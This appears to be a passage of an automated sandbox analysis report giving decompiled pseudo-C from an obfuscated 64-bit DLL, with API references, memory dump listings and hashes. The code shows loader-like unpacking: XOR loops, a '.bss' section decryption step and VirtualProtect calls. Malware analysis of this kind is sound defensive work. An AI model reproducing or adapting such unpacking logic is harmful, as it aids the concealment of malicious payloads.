68->40 69 7ff88c07b498-7ff88c07b4b5 call 7ff88c07d050 68->69 69->40
                          C-Code - Quality: 100%
                          			E00007FF87FF88C07B3A0(void* __edx) {
                          				void* _t5;
                          
                          				_t5 = __edx;
                          				if (_t5 == 0) goto 0x8c07b3e1;
                          				if (_t5 == 0) goto 0x8c07b3d5;
                          				if (_t5 == 0) goto 0x8c07b3c8;
                          				if (__edx == 1) goto 0x8c07b3c1;
                          				return 1;
                          			}




                          0x7ff88c07b3a4
                          0x7ff88c07b3a6
                          0x7ff88c07b3ab
                          0x7ff88c07b3b0
                          0x7ff88c07b3b5
                          0x7ff88c07b3c0

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 3885183344-0
                          • Opcode ID: 4b4e070a4b30cda99fb3dc24f2d45a93fe48c4a995dadef060bf1a20821bd7b8
                          • Instruction ID: ebc0c4238855db4a30a4edf9e908227cd1dfd213298ef84b59b9eeeaa348b8e1
                          • Opcode Fuzzy Hash: 4b4e070a4b30cda99fb3dc24f2d45a93fe48c4a995dadef060bf1a20821bd7b8
                          • Instruction Fuzzy Hash: FA51AD20E0C64385FE68AB65E8422B926A0BF777C0F445035E94D876DFCF2EE995CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 40%
                          			E00007FF87FF88C072380(signed int __rax, long long __rbx, void* __rcx, void* __rdx, signed int* __r8, void* __r9, long long __r12) {
                          				void* __rsi;
                          				signed int _t119;
                          				signed int _t160;
                          				void* _t163;
                          				signed int _t172;
                          				signed long long _t180;
                          				signed long long _t200;
                          				signed long long _t201;
                          				void* _t202;
                          				void* _t204;
                          				long long _t206;
                          				void* _t208;
                          				void* _t209;
                          				void* _t219;
                          				void* _t223;
                          				void* _t225;
                          				void* _t227;
                          
                          				_t172 = __rax;
                          				goto 0x8c091440;
                          				asm("int3");
                          				asm("int3");
                          				asm("int3");
                          				asm("int3");
                          				asm("int3");
                          				asm("int3");
                          				_t219 = _t208;
                          				 *((long long*)(_t219 + 0x18)) = __rbx;
                          				 *((long long*)(_t219 + 0x20)) = _t206;
                          				_push(_t204);
                          				_t209 = _t208 - 0x60;
                          				r13d = __r9 + 0x6ab;
                          				 *(_t209 + 0xb8) =  *((intOrPtr*)(_t209 + 0xc8)) + 0x152;
                          				 *((intOrPtr*)(_t209 + 0x98)) =  *(_t209 + 0xb8) + 0xfffffc37;
                          				r14d = __rcx + 0x37e1;
                          				r15d = __rdx + 0x1249;
                          				r14d =  <  ? __r9 - 0x2103 : r14d;
                          				if (r15d - _t206 + 0x3a59 > 0) goto 0x8c072709;
                          				 *((long long*)(_t219 + 8)) = __r12;
                          				_t163 = r14d - _t227 + 0x108;
                          				if (_t163 > 0) goto 0x8c0725c8;
                          				 *((long long*)(_t219 - 0x60)) = 0x2032;
                          				r12d = 0x3189;
                          				 *(_t209 + 0x20) = 0x3595;
                          				r8d = r12d;
                          				r9d = 0x1f2c;
                          				E00007FF87FF88C079AC0(__r8, __rcx, __r8, _t206, _t227); // executed
                          				r11d = _t202 + 0x19d;
                          				 *(_t209 + 0x50) = __r8;
                          				r10d = _t225 - 0x1033;
                          				__r8[0x22] = _t172;
                          				 *(_t209 + 0x48) = _t223 - 0x3b8;
                          				_t160 = __rcx - 0x114f;
                          				 *(_t209 + 0x40) = r10d;
                          				r8d = __rcx - 0x2ad;
                          				 *(_t209 + 0x38) = r11d;
                          				r9d = _t225 - 0x16de;
                          				 *(_t209 + 0x30) = _t206 + 0x36e7;
                          				 *((intOrPtr*)(_t209 + 0x28)) = __rdx + 0xfffffa9a;
                          				 *(_t209 + 0x20) = _t160;
                          				E00007FF87FF88C08F160(_t172, __r8, __r8, _t225, _t223, _t202);
                          				r8d = 0;
                          				if (_t163 == 0) goto 0x8c072589;
                          				r9d = r8d;
                          				asm("o16 nop [eax+eax]");
                          				_t200 = __r8[0x90];
                          				 *(__r9 + __r8[0x22]) =  *(_t200 + __r8[2]) & 0x000000ff ^  *(__r8[0x14] + __r9);
                          				__r8[0x90] = ( *((intOrPtr*)(__r8[0x10] + 0x130)) - 0x23f6) % __r8[0xe];
                          				__r8[0x7c] = __r8[0x7c] + 0x1f2c;
                          				if (__r8[0x78] != __r8[0xc]) goto 0x8c072568;
                          				__r8[0x32] = __r8[0x32] + 0xffffdfce;
                          				r8d = r8d + 1;
                          				_t180 = r8d;
                          				if (_t180 - _t200 < 0) goto 0x8c0724f0;
                          				__r8[0x66] = __r8[0x66] | 0x0a01b449;
                          				_t119 = __r8[0x4c] ^ 0x0000127e;
                          				if (_t119 - r12d >= 0) goto 0x8c0725b8;
                          				r12d = r12d - _t119;
                          				__r8[0x66] = __r8[0x66] + _t180 * 0x44f9;
                          				__r8[0x56] = __r8[0x14];
                          				goto 0x8c072701;
                          				if (r14d - _t204 + 0x329d + r14d >= 0) goto 0x8c072624;
                          				_t201 = _t200 | __r8[0x2a];
                          				if (__r8[0x2e] - _t201 > 0) goto 0x8c072624;
                          				if ( *((intOrPtr*)( *__r8 + 0x1d0)) + 0x8acf - _t201 <= 0) goto 0x8c072610;
                          				__r8[0x32] = __r8[0x32] - ( *__r8 - 0x00001f2c ^ 0x00002032);
                          				if (__r8[0x7e] - (_t160 | r13d) < 0) goto 0x8c0726ed;
                          				r10d = _t160;
                          				r11d = __r8[0x78];
                          				r15d = r15d - (__r8[6] ^ r15d);
                          				r11d = r11d - __r8[0x74];
                          				r11d = r11d + __r8[0x24];
                          				r14d = r14d *  *__r8;
                          				r15d = r15d + 0xea7;
                          				r10d = r10d - __r8[0x12];
                          				r15d = r15d ^ 0x00002598;
                          				r8d = __r8[4];
                          				r9d = _t160;
                          				r8d = r8d &  *(_t209 + 0xb8);
                          				r12d = 0x3189;
                          				 *(_t209 + 0x58) = __r8[0x54] & 0x0000228c;
                          				r9d = r9d | r12d;
                          				 *(_t209 + 0x50) = _t160 & 0x00003666;
                          				 *(_t209 + 0x48) = r11d;
                          				 *(_t209 + 0x40) = __r8;
                          				 *(_t209 + 0x38) = r10d;
                          				 *(_t209 + 0x30) = r15d;
                          				 *((intOrPtr*)(_t209 + 0x28)) = _t223 - 0x343a;
                          				 *(_t209 + 0x20) = r14d;
                          				E00007FF87FF88C072060(__r8, _t160 | r13d, _t201, _t204, _t206, __r8[0x32] - ( *__r8 - 0x00001f2c ^ 0x00002032));
                          				__r8[0x62] = __r8[0x62] - __r8[0x4c] + _t160;
                          				return  *((intOrPtr*)(_t209 + 0xc0)) + 0xffffee61;
                          			}




















                          0x7ff88c072380
                          0x7ff88c072385
                          0x7ff88c07238a
                          0x7ff88c07238b
                          0x7ff88c07238c
                          0x7ff88c07238d
                          0x7ff88c07238e
                          0x7ff88c07238f
                          0x7ff88c072390
                          0x7ff88c072393
                          0x7ff88c072397
                          0x7ff88c07239b
                          0x7ff88c0723a3
                          0x7ff88c0723bc
                          0x7ff88c0723d4
                          0x7ff88c0723e1
                          0x7ff88c0723eb
                          0x7ff88c0723f2
                          0x7ff88c072402
                          0x7ff88c07240f
                          0x7ff88c07241c
                          0x7ff88c072420
                          0x7ff88c072423
                          0x7ff88c07242e
                          0x7ff88c072436
                          0x7ff88c07243c
                          0x7ff88c072441
                          0x7ff88c072444
                          0x7ff88c072452
                          0x7ff88c07245e
                          0x7ff88c072465
                          0x7ff88c07246a
                          0x7ff88c072471
                          0x7ff88c07248b
                          0x7ff88c07248f
                          0x7ff88c072495
                          0x7ff88c07249a
                          0x7ff88c0724a1
                          0x7ff88c0724a6
                          0x7ff88c0724ad
                          0x7ff88c0724b8
                          0x7ff88c0724c3
                          0x7ff88c0724c7
                          0x7ff88c0724cf
                          0x7ff88c0724de
                          0x7ff88c0724e4
                          0x7ff88c0724e7
                          0x7ff88c0724f0
                          0x7ff88c07250e
                          0x7ff88c072534
                          0x7ff88c07253e
                          0x7ff88c07255b
                          0x7ff88c07255d
                          0x7ff88c07256b
                          0x7ff88c07257d
                          0x7ff88c072583
                          0x7ff88c07258f
                          0x7ff88c07259a
                          0x7ff88c0725a2
                          0x7ff88c0725a4
                          0x7ff88c0725b1
                          0x7ff88c0725bc
                          0x7ff88c0725c3
                          0x7ff88c0725d4
                          0x7ff88c0725ea
                          0x7ff88c0725f4
                          0x7ff88c07261b
                          0x7ff88c07261d
                          0x7ff88c072634
                          0x7ff88c07263d
                          0x7ff88c072649
                          0x7ff88c072650
                          0x7ff88c072653
                          0x7ff88c07266d
                          0x7ff88c07267a
                          0x7ff88c07267e
                          0x7ff88c072685
                          0x7ff88c072689
                          0x7ff88c072690
                          0x7ff88c072694
                          0x7ff88c0726b2
                          0x7ff88c0726ba
                          0x7ff88c0726c0
                          0x7ff88c0726c4
                          0x7ff88c0726c7
                          0x7ff88c0726cb
                          0x7ff88c0726d0
                          0x7ff88c0726d5
                          0x7ff88c0726da
                          0x7ff88c0726df
                          0x7ff88c0726e3
                          0x7ff88c0726e8
                          0x7ff88c0726fa
                          0x7ff88c07272d

                          APIs
                          • GetProcessHeap.KERNEL32 ref: 00007FF88C091456
                          • HeapAlloc.KERNEL32 ref: 00007FF88C091467
                            • Part of subcall function 00007FF88C087C20: VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FF88C07A050), ref: 00007FF88C087CFC
                            • Part of subcall function 00007FF88C087C20: VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FF88C07A050), ref: 00007FF88C087E18
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: HeapProtectVirtual$AllocProcess
                          • String ID: 2 $6$62 $662 $7$8662
                          • API String ID: 3541638468-3329516171
                          • Opcode ID: 59bb83eef75242a5c0dbf160cfb2881c3e280effa3ab4466507c8ae61b5f1636
                          • Instruction ID: f4e03784fdbce272c417aad10a8c1e144b91b8d91abee70699c1a71aecb99e41
                          • Opcode Fuzzy Hash: 59bb83eef75242a5c0dbf160cfb2881c3e280effa3ab4466507c8ae61b5f1636
                          • Instruction Fuzzy Hash: F832F4735182C18BE371CF29E44479EBBA4F788748F144129EA8997B59DB7CE954CF00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 34%
                          			E0000027E27ED3714DB4(long long __rbx, long long __rcx, long long __rdi, long long __rsi, void* __r9, void* __r11) {
                          				intOrPtr _t22;
                          				intOrPtr _t23;
                          				void* _t30;
                          				long long _t55;
                          				void* _t71;
                          				intOrPtr* _t74;
                          				intOrPtr* _t75;
                          				long long _t81;
                          				long long _t82;
                          				long long _t84;
                          				void* _t90;
                          				long _t92;
                          				long _t94;
                          				long _t96;
                          
                          				_t90 = __r9;
                          				_t55 = _t84;
                          				 *((long long*)(_t55 + 8)) = __rbx;
                          				 *((long long*)(_t55 + 0x10)) = _t81;
                          				 *((long long*)(_t55 + 0x18)) = __rsi;
                          				 *((long long*)(_t55 + 0x20)) = __rdi;
                          				_t82 = __rcx;
                          				r8d = 0;
                          				HeapCreate(_t96, _t94, _t92); // executed
                          				if (_t55 == 0) goto 0xd3714f03;
                          				_t71 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
                          				_t74 = _t55 + _t71 + 0x68;
                          				_t22 =  *_t74;
                          				if (_t22 == 0) goto 0xd3714e94;
                          				if (_t22 == 0x7373622e) goto 0xd3714e22;
                          				_t75 = _t74 + 0x28;
                          				_t23 =  *_t75;
                          				if (_t23 != 0) goto 0xd3714e11;
                          				if (_t23 == 0) goto 0xd3714e94;
                          				r13d =  *(_t75 + 0x10);
                          				r12d =  *(_t75 + 0x14);
                          				r12d = r12d ^  *(_t71 + 8);
                          				r12d = r12d ^ r13d;
                          				HeapAlloc(??, ??, ??);
                          				if (_t55 == 0) goto 0xd3714e8d;
                          				r9d = r12d;
                          				r8d = r13d;
                          				E0000027E27ED371111C(_t55, _t55, __rbx, _t55, _t71 + __rcx);
                          				r11d =  *((intOrPtr*)(_t75 + 0xc));
                          				 *0xd371d448 = _t55 - __r11 - _t82;
                          				 *0xd371d450 = E0000027E27ED37116FC(_t55, _t55 - __r11 - _t82 + 0xd3721040);
                          				goto 0xd3714e99;
                          				goto 0xd3714e99;
                          				if (2 == 0) goto 0xd3714ea8;
                          				HeapDestroy(??);
                          				goto 0xd3714f03;
                          				HeapAlloc(??, ??, ??);
                          				if (0xd3721040 != 0) goto 0xd3714ee1;
                          				HeapDestroy(??);
                          				goto 0xd3714f03;
                          				0xd371487a();
                          				 *0x27ED3721048 = _t55;
                          				 *0xd371d458 = 0xd3721040; // executed
                          				_t30 = E0000027E27ED37137E0(0xd3721040, _t82, _t90); // executed
                          				return _t30;
                          			}

















                          0x27ed3714db4
                          0x27ed3714db4
                          0x27ed3714db7
                          0x27ed3714dbb
                          0x27ed3714dbf
                          0x27ed3714dc3
                          0x27ed3714dd1
                          0x27ed3714dd4
                          0x27ed3714de3
                          0x27ed3714def
                          0x27ed3714dfb
                          0x27ed3714e02
                          0x27ed3714e07
                          0x27ed3714e0b
                          0x27ed3714e16
                          0x27ed3714e18
                          0x27ed3714e1c
                          0x27ed3714e20
                          0x27ed3714e24
                          0x27ed3714e26
                          0x27ed3714e2a
                          0x27ed3714e31
                          0x27ed3714e3a
                          0x27ed3714e3d
                          0x27ed3714e49
                          0x27ed3714e4e
                          0x27ed3714e51
                          0x27ed3714e5a
                          0x27ed3714e5f
                          0x27ed3714e75
                          0x27ed3714e85
                          0x27ed3714e8b
                          0x27ed3714e92
                          0x27ed3714e9b
                          0x27ed3714ea0
                          0x27ed3714ea6
                          0x27ed3714ec3
                          0x27ed3714ecf
                          0x27ed3714ed4
                          0x27ed3714edf
                          0x27ed3714ee9
                          0x27ed3714eee
                          0x27ed3714ef5
                          0x27ed3714efc
                          0x27ed3714f23

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: Heap$AllocDestroy$Create
                          • String ID: .bss
                          • API String ID: 388876957-3890483948
                          • Opcode ID: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                          • Instruction ID: f5a97093b0c4142ed8aeef0169fb37589a18a274d96d50ac6d6d116c1c2d9e92
                          • Opcode Fuzzy Hash: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                          • Instruction Fuzzy Hash: F5416A36708B41C6FF248B52984832A63A9F78EB94F0660659E49477CADE38D855C720
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 35%
                          			E00007FF87FF88C087C20(long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, signed int __r9) {
                          				void* __rdi;
                          				signed int _t150;
                          				void* _t153;
                          				signed int _t154;
                          				void* _t156;
                          				signed int _t157;
                          				signed long long _t192;
                          				signed long long _t210;
                          				signed long long _t228;
                          				void* _t229;
                          				intOrPtr _t230;
                          				long long _t234;
                          				long long* _t235;
                          				void* _t237;
                          				void* _t238;
                          				signed long long _t242;
                          				intOrPtr* _t248;
                          				signed long long _t250;
                          				signed int _t251;
                          				void* _t252;
                          				long _t254;
                          				void* _t256;
                          				long _t258;
                          				void* _t260;
                          
                          				_t252 = _t237;
                          				 *((long long*)(_t252 + 8)) = __rbx;
                          				 *((long long*)(_t252 + 0x10)) = _t234;
                          				 *((long long*)(_t252 + 0x18)) = __rsi;
                          				_t238 = _t237 - 0x60;
                          				r14d = __rcx - 0x2103;
                          				r12d = __r8 + 0xd1;
                          				r15d =  *(_t238 + 0xd8);
                          				_t153 =  *(_t238 + 0xd0) + 0xfffff9ee;
                          				_t156 = __rdx + 0xeb4;
                          				r15d = r15d + 0x1249;
                          				r13d = __rdx - 0x27b2;
                          				r8d = r8d + 0x152;
                          				if (_t156 - _t258 + 0x329d < 0) goto 0x8c087f40;
                          				if (r14d == _t156) goto 0x8c087f24;
                          				if ( *((long long*)(__r9 + 0x2f8)) == 0) goto 0x8c087e1e;
                          				 *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x198)) +  *(__r9 + 0x90) - 0x3a59;
                          				_t235 =  *((intOrPtr*)(__r9 + 0x2f8));
                          				 *((long long*)(__r9 + 0x48)) = 0x84ef49a;
                          				r8d =  *( *((intOrPtr*)(__r9)) + 0x130);
                          				r8d = r8d ^ 0x000023f3; // executed
                          				if (VirtualProtect(_t260, _t258) != 0) goto 0x8c087d2b;
                          				if ( *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x188)) + 0x259 - 0x3595 < 0) goto 0x8c087d2b;
                          				 *(__r9 + 0x90) =  *(__r9 + 0x90) ^ __r9 + 0x000001c0;
                          				if ( *( *((intOrPtr*)(__r9 + 0x1c8)) + 0x60) * 0xc3622d03 - 0x30d5 <= 0) goto 0x8c087d6a;
                          				_t242 =  *(__r9 + 0x228) ^ 0x00001f2c;
                          				 *(__r9 + 0x120) = _t242;
                          				if (0x30d6 - _t235 < 0) goto 0x8c087d51;
                          				_t210 =  *((intOrPtr*)(__r9));
                          				_t248 = _t238 + 0xd0;
                          				 *((intOrPtr*)(_t210 + 0x198)) =  *((intOrPtr*)(_t210 + 0x198)) +  *((intOrPtr*)(__r9 + 0x70)) + 0x2032;
                          				 *((long long*)(_t235 + 8)) =  *((intOrPtr*)(__r9 + 0xc0));
                          				 *((intOrPtr*)(_t235 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x118)) + 0x50));
                          				 *((long long*)(__r9 + 0x28)) = __r9 + 0x1b0;
                          				r8d =  *( *((intOrPtr*)(__r9 + 0x118)) + 0x88 + _t210 * 8);
                          				 *_t235 = _t242 +  *((intOrPtr*)(__r9 + 0xc0));
                          				 *((long long*)(__r9 + 0xa0)) = 0x6dce;
                          				 *((intOrPtr*)(_t235 + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x118)) + 0xa4));
                          				 *( *((intOrPtr*)(__r9 + 0x140)) + 0x198) =  *( *((intOrPtr*)(__r9 + 0x140)) + 0x198) |  *(__r9 + 0x198) + 0x0000329d;
                          				r8d =  *(_t238 + 0xd0);
                          				VirtualProtect(_t256, _t254);
                          				if (_t153 - _t229 + 0x30d5 < 0) goto 0x8c08803b;
                          				r14d = r14d + 0x30d5;
                          				 *((long long*)(__r9 + 0x158)) =  *((intOrPtr*)(__r9 + 0x88));
                          				 *((long long*)(__r9 + 0x298)) = _t235 +  *((intOrPtr*)(__r9 + 0xc0));
                          				 *((long long*)(__r9 + 0x10)) = 0x2598;
                          				 *(__r9 + 0x198) =  *(__r9 + 0x198) * 0xed7e2e8;
                          				_t230 =  *((intOrPtr*)(__r9 + 0x158));
                          				if (_t230 == 0) goto 0x8c087eac;
                          				_t192 =  *(__r9 + 0x1e0) | 0x0000228c;
                          				 *(__r9 + 0x198) = _t192;
                          				GetProcessHeap();
                          				if (_t192 == 0) goto 0x8c087eac;
                          				HeapFree(??, ??, ??); // executed
                          				r8d =  *(_t238 + 0xd8);
                          				 *((intOrPtr*)(_t238 + 0x50)) = _t254 + 0x81;
                          				r10d = _t256 + 0x2032;
                          				 *(_t238 + 0x48) = r10d;
                          				r11d = _t254 - 0x1563;
                          				 *((intOrPtr*)(_t238 + 0x40)) = r11d;
                          				_t150 = _t260 - 0x544;
                          				 *(_t238 + 0x38) = _t150;
                          				_t157 = _t258 - 0xb3d;
                          				_t154 = _t153 + 0x1c8;
                          				r9d = _t258 + 0x612;
                          				 *(_t238 + 0x30) = _t154;
                          				 *(_t238 + 0x28) = __r9;
                          				r8d = r8d + 0x216;
                          				 *(_t238 + 0x20) = _t157;
                          				E00007FF87FF88C0782D0( *((intOrPtr*)(__r9 + 0x328)), _t230, _t230); // executed
                          				goto 0x8c08803b;
                          				goto 0x8c08803b;
                          				_t228 = r15d;
                          				_t251 = _t154;
                          				if (_t251 - (( *(_t248 + 0xd8) | _t228) ^ _t157) >= 0) goto 0x8c087ffe;
                          				if (_t251 -  *((intOrPtr*)(_t248 + 0x110)) +  *_t248 >= 0) goto 0x8c087fe6;
                          				SetEndOfFile(_t229);
                          				r9d =  *(__r9 + 0xc8);
                          				r10d =  *(__r9 + 0xf0);
                          				r9d = r9d & _t157;
                          				r10d = r10d ^  *(__r9 + 0x90);
                          				r9d = r9d ^ 0x00003666;
                          				 *(_t238 + 0x38) = r9d;
                          				r13d = r13d | _t154;
                          				 *(_t238 + 0x30) = _t150 & 0x000027b2;
                          				r10d = r10d - 0x3a59;
                          				 *(_t238 + 0x28) = _t154 & 0x00000008 | 0x000023f6;
                          				 *(_t238 + 0x20) = r10d;
                          				r8d = r13d;
                          				r14d = E00007FF87FF88C078BF0((_t154 & 0x000027b2) +  *(__r9 + 0x120),  *((intOrPtr*)(__r9 + 0x130)) + r14d,  *((intOrPtr*)(_t248 + 0x110)) +  *_t248, __r9, ( *(_t248 + 0xd8) | _t228) ^ _t157, _t228, _t230, __r9, _t252);
                          				goto 0x8c08803b;
                          				 *(__r9 + 0x100) =  *(__r9 + 0x100) |  *((intOrPtr*)(__r9 + 0x188)) +  *((intOrPtr*)(__r9 + 0x78)) +  *((intOrPtr*)(__r9 + 0x70));
                          				goto 0x8c08803b;
                          				_t250 =  *((intOrPtr*)(__r9 + 0x1f0));
                          				if (_t251 == r8d * _t250 - _t228) goto 0x8c08803b;
                          				r8d = r8d * (_t230 + _t230);
                          				if (_t154 + 1 != r8d * _t250 - _t228) goto 0x8c088020;
                          				return _t258 - 0xfd2;
                          			}



























                          0x7ff88c087c20
                          0x7ff88c087c23
                          0x7ff88c087c27
                          0x7ff88c087c2b
                          0x7ff88c087c38
                          0x7ff88c087c43
                          0x7ff88c087c51
                          0x7ff88c087c58
                          0x7ff88c087c6e
                          0x7ff88c087c74
                          0x7ff88c087c7a
                          0x7ff88c087c87
                          0x7ff88c087c8e
                          0x7ff88c087c9a
                          0x7ff88c087ca3
                          0x7ff88c087cb1
                          0x7ff88c087cc7
                          0x7ff88c087cce
                          0x7ff88c087cdb
                          0x7ff88c087cee
                          0x7ff88c087cf5
                          0x7ff88c087d04
                          0x7ff88c087d1b
                          0x7ff88c087d24
                          0x7ff88c087d41
                          0x7ff88c087d4a
                          0x7ff88c087d53
                          0x7ff88c087d68
                          0x7ff88c087d6a
                          0x7ff88c087d6d
                          0x7ff88c087d7f
                          0x7ff88c087d8d
                          0x7ff88c087da2
                          0x7ff88c087da5
                          0x7ff88c087dbd
                          0x7ff88c087dcf
                          0x7ff88c087dd3
                          0x7ff88c087deb
                          0x7ff88c087e02
                          0x7ff88c087e09
                          0x7ff88c087e18
                          0x7ff88c087e26
                          0x7ff88c087e33
                          0x7ff88c087e4b
                          0x7ff88c087e52
                          0x7ff88c087e64
                          0x7ff88c087e6c
                          0x7ff88c087e73
                          0x7ff88c087e7d
                          0x7ff88c087e86
                          0x7ff88c087e8c
                          0x7ff88c087e93
                          0x7ff88c087e9c
                          0x7ff88c087ea6
                          0x7ff88c087eac
                          0x7ff88c087ebc
                          0x7ff88c087ec0
                          0x7ff88c087ec7
                          0x7ff88c087ecc
                          0x7ff88c087ed4
                          0x7ff88c087ed9
                          0x7ff88c087ee0
                          0x7ff88c087ee4
                          0x7ff88c087eeb
                          0x7ff88c087ef1
                          0x7ff88c087ef8
                          0x7ff88c087f03
                          0x7ff88c087f0f
                          0x7ff88c087f16
                          0x7ff88c087f1a
                          0x7ff88c087f1f
                          0x7ff88c087f3b
                          0x7ff88c087f47
                          0x7ff88c087f53
                          0x7ff88c087f59
                          0x7ff88c087f6c
                          0x7ff88c087f6e
                          0x7ff88c087f74
                          0x7ff88c087f7d
                          0x7ff88c087f84
                          0x7ff88c087f87
                          0x7ff88c087f8e
                          0x7ff88c087f9d
                          0x7ff88c087fbc
                          0x7ff88c087fbf
                          0x7ff88c087fc3
                          0x7ff88c087fca
                          0x7ff88c087fd1
                          0x7ff88c087fd9
                          0x7ff88c087fe1
                          0x7ff88c087fe4
                          0x7ff88c087ff5
                          0x7ff88c087ffc
                          0x7ff88c087ffe
                          0x7ff88c088012
                          0x7ff88c088025
                          0x7ff88c088039
                          0x7ff88c08805f

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: ProtectVirtual$FileHeapPrivilegeProcessRelease
                          • String ID:
                          • API String ID: 1146652191-0
                          • Opcode ID: f8c4942e56d1cc675816b14a356dfaf46b24f5be3101768ff6fcfd4b9866806c
                          • Instruction ID: c05a0f132b508e2c396091192bc5a2eeedb555c1cbab09a705f29a58fb9252fc
                          • Opcode Fuzzy Hash: f8c4942e56d1cc675816b14a356dfaf46b24f5be3101768ff6fcfd4b9866806c
                          • Instruction Fuzzy Hash: FDB19773604B858ADBA0CF26D898BE933A4F789B88F058136CE0D4B759DF38D651CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 58%
                          			E00007FF87FF88C08A4A0(long long __rax, signed int __rcx, void* __rdx, void* __r9, intOrPtr _a16, intOrPtr _a80, intOrPtr _a88, intOrPtr _a96, intOrPtr _a104, intOrPtr _a120) {
                          				long long _v96;
                          				short _v104;
                          				void* __rbx;
                          				long long _t55;
                          				intOrPtr _t60;
                          				signed long long _t62;
                          				void* _t68;
                          				void* _t69;
                          
                          				_t55 = __rax;
                          				r8d = r8d + 4;
                          				_a104 = _a104 + 0xfffffdb4;
                          				r9d = __rcx - 0x30d5;
                          				_a96 = r8d;
                          				_a16 = r9d;
                          				_a120 = _a80 + 0xffffda68;
                          				if (_a120 + 0x18b7 - __r9 + 0x38e9 > 0) goto 0x8c08a608;
                          				if (__rdx - 0xea2 - _a96 + 0xffffee57 <= 0) goto 0x8c08a5fa;
                          				_t60 = _a88;
                          				_v96 = 0x38e9;
                          				r9d = 0x3666;
                          				_v104 = 0x2598;
                          				r8d = 0x37e1;
                          				E00007FF87FF88C079AC0(_t60, __rcx, _t60, _t69); // executed
                          				 *((long long*)(_t60 + 0x348)) = _t55;
                          				_t62 = __rcx ^ 0x0000a532;
                          				 *(_t60 + 0x158) = _t62;
                          				if ( *( *((intOrPtr*)(_t60 + 0x1a0)) + 0xb0) * 0x4b917808 == 0x2598) goto 0x8c08a5bc;
                          				 *(_t60 + 0x1b0) =  *(_t60 + 0x1b0) |  *( *((intOrPtr*)(_t60 + 0x1c0)) + 0x120) ^ 0x00002032;
                          				if (0x2599 != _t62) goto 0x8c08a590;
                          				_v96 = 0x3189;
                          				r9d = 0x3666;
                          				_v104 = 0x30d5;
                          				r8d = 0x37e1;
                          				E00007FF87FF88C079AC0(_t60, _t62, _t60, _t69);
